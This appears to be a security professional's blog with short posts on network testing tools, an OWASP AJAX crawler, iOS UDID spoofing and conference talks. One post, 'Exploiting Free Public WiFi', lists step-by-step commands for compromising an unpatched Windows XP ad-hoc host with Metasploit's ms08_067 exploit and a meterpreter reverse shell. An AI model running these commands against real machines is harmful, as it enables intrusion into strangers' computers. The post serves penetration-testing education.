Security Reliks

ICSI Netalyzr

Skyler — Tue, 27 Mar 2012 00:03:39 +0000

Here is a pretty neat tool. My brother sent it to me. Essentially it runs the gambit of tests from DNS to HTTP and TCP/UDP port access and performance.

Some possible applications include:

basic network testing
identifying firewall rules
identifying IPS filters

Check it out: http://netalyzr.icsi.berkeley.edu/

New Version of OWASP AJAX Crawling Tool

Skyler — Sat, 25 Feb 2012 18:22:05 +0000

There is a new release of the AJAX Crawling Tool. I have added a new ‘Output’ tab so you can see the specific url being discovered. I have also enabled output into a flat file as well as standard output.

http://code.google.com/p/fuzzops-ng/

OWASP AJAX Crawling Tool BETA release and how you can help!

Skyler — Mon, 06 Feb 2012 23:41:41 +0000

Hey everybody! Sorry I have been MIA for so long. Im currently doing some training, and its requiring 13 hour work days.

Anyway, there is an update to ACT that will enable users to utilize it as part of scripting, etc.

How you can help

I have released it as the first beta release for two reasons:

I need more bug reports
I want to know what new features people want

So, please download the new release here: http://code.google.com/p/fuzzops-ng/downloads/list

And when you find a bug, or think of a new feature, log it here: http://code.google.com/p/fuzzops-ng/issues/list

Also…

I am looking for a developer with interest/experience with the ZAP (Zed Attack Proxy) OWASP tool. Simon (the creator) and I have been discussing a plugin module to integrate ACT into ZAP as an installable extension (NOT a combination of the tools). If you are interested, please contact me.

AJAX Crawling Tool added to OWASP

Skyler — Mon, 21 Nov 2011 07:58:18 +0000

Yup, my AJAX Crawling Tool has been accepted as part of OWASP!

Check it out: https://www.owasp.org/index.php/OWASP_AJAX_Crawling_Tool

Exploiting “Free Public WiFi”

Skyler — Wed, 02 Nov 2011 18:05:01 +0000

A few weeks ago Joshua Wright did a SANS webcast on Exploiting Modern Wireless Networks. For a long time WiFi attacks have focused on either cracking WEP, or brute forcing a WPA shared key. Josh goes over some of the new attack vectors against wireless and how you can use them in a penetration test.

My favorite slide had to do with that obscure “Free Public WiFi” SSID that we see all over the place. I see these all the time at airports, but also at hotels and other commonly utilized public wifi areas. Apparently this is the default name for ad-hoc networks that are created by Windows XP SP2. Obviously this gets us excited ( MS 08-067). If they are running an XP SP2 box, we can probably assume that the machine is not frequently administered, and most likely not patched. Here are the simple steps that Josh Wright provided in order to exploit this machine:

Connect to the adhoc network

# iwconfig wlan1 essid "Free Public WiFi" mode adhoc

Use tcpdump to find the IP (bolded IP below) of the XP box hosting the ad hoc network. Note: the hosting box will be broadcasting NetBIOS packets to help configure associated clients.

# tcpdump -ni wlan1 -s0 -nt

IP 169.254.131.118.138 > 169.254.255.255.138: NBT UDP PACKET(138)

Configure your IP (for the reverse shell to shovel back to)

# ifconfig wlan1 196.254.1.1 netmask 255.255.0.0

Own It

# msconsole

# use exploit/windows/smb/ms08_067_netapi

# set PAYLOAD windows/meterpreter/reverse_tcp

# set LPORT 9999

# set RHOST 169.254.131.118

# set LHOST 169.254.1.1

# exploit

Pretty straight forward, huh? As always, thanks to the SANS teams for their awesome contributions to the security industry. Make sure to check out the new SANS Pen Testing blog! its fantastic!

Demo: Enumerating AJAX Applications with ACT (AJAX Crawling Tool)

Skyler — Tue, 25 Oct 2011 01:52:21 +0000

I created this video in response to multiple and varying requests for information about the tool I just released. This demo shows how ACT can be utilized to more thoroughly enumerate an AJAX application, and then leverage those findings via your favorite attack proxy.

Go check out the demo here: http://vimeo.com/31059474

and download ACT here: http://code.google.com/p/fuzzops-ng/downloads/list

“It’s alive!”… and so am I!

Skyler — Fri, 21 Oct 2011 15:09:44 +0000

Hey everybody! Sorry I haven’t posted recently! Lots has been going on here at school and with work. But don’t be dismayed! I have been hard at work! In the past I had posted my Web App and Web Service fuzzier. Well, after reviewing the code, and the level of bugs, I took it back to the drawing board! What I am releasing now is the alpha version of the crawling module of the tool.

Why the rewrite?

Well, the first release (FuzzOps) was very buggy and not very well designed. It did not allow for the type of flexibility that I wanted from the tool.

Why did you modularize the crawler?

After reviewing the purpose of the tool and hearing about some needs in the community, I felt like a portion (the fuzzer) of the project would essentially be “reinventing the wheel”. However, the crawler itself is a unique functionality that lots of security professionals would like to utilize. So rather than tying the AJAX crawling code to the fuzzer, I have made it a module that can be used with any proxy out there. Tying these tools together can then allow security experts to properly crawl their target web applications utilizing their favorite proxy.

ACT (AJAX Crawling Tool) is part of the FuzzOps-NG project. You can download it here:

http://code.google.com/p/fuzzops-ng/downloads/list

Make sure to read the README on the wiki page.

NOTE: ACT is heavily dependent upon the work done by Seleinum and Crawljax. Please acknowledge them for this tool’s heavy lifting.

Security Implications of Apple’s Transition Away From UDIDs

Skyler — Sat, 20 Aug 2011 13:41:17 +0000

It was reported that as of iOS 5 Apple will no longer permit developers to utilize the device UDID (Unique Device Identifier). This has numerous functionality issues which will become evident (if they arn’t already). You can read the article here.

UDID

For those unfamiliar with iOS development, it is important to understand how UDIDs are utilized for use in applications. Rather than require the storage of credentials or a generated user ID within the user’s plist (properties) file, many applications rely upon an API call to locally grab the UDID and use that as the primary mode of identification between the server and the client. This removes the need to store passwords or other login credentials in a less safe environment. However, with the proposed changes developers will now need to generate their own unique IDs and store them within the applications plist file.

Application Spoofing/Hijacking

This change, however, may leave the device open to spoofing attacks (both targeted and brute-forced). Because a new application generated identifier will now reside within user accessible storage, the application is forced to trust possibly modified data. Any sort of salting or client-to-server encryption is also evaded because that is done by the application after fetching the stored ID and before the client contacts the server. This clearly stands out from normal network spoofing/hijacking, but can have the same result.

Solution

Admittedly, I havn’t put a ton of thought into a thorough solution. However, my initial assessment seems to indicate that if an application were to encrypt or encode the unique ID before sending it to the client, and again before storing it in the plist file. This would make modification of a stored ID impossible, as well as obfuscate it in transit to prevent sniffing the unencrypted ID. This bypasses the spoofing, as well as prevents a pass-the-hash type attack.

EDIT: Here is the proof-of-concept

iOS App Spoofing through plist Hijacking from Skyler Onken on Vimeo.

BSidesLosAngeles Aftermath

Skyler — Sat, 20 Aug 2011 00:21:07 +0000

Well, BSidesLosAngeles was great!! Lots of great information.

I am providing a link to the slides from my presentation. I also want to give a special thanks to Dan Manson for his help.

I recommend going to the slideshare and downloading the actual ppt. I use quite a few transitions, so the slideshare overlaps those.

Solving the US Cyber Challenge: Cyber Quest

And the pcap: http://www.mediafire.com/?33xynmkr75zeauy

Scripting Language Quick Reference and Comparison

Skyler — Sun, 14 Aug 2011 05:59:47 +0000

Here is a sweet link shared with me by a friend from the US Cyber Challenge. Its a great reference for Python, Perl, PHP and Ruby. It includes simple examples of common scripting uses, and shows them side-by-side with all 4 languages.

Hyperpolyglot

Enjoy!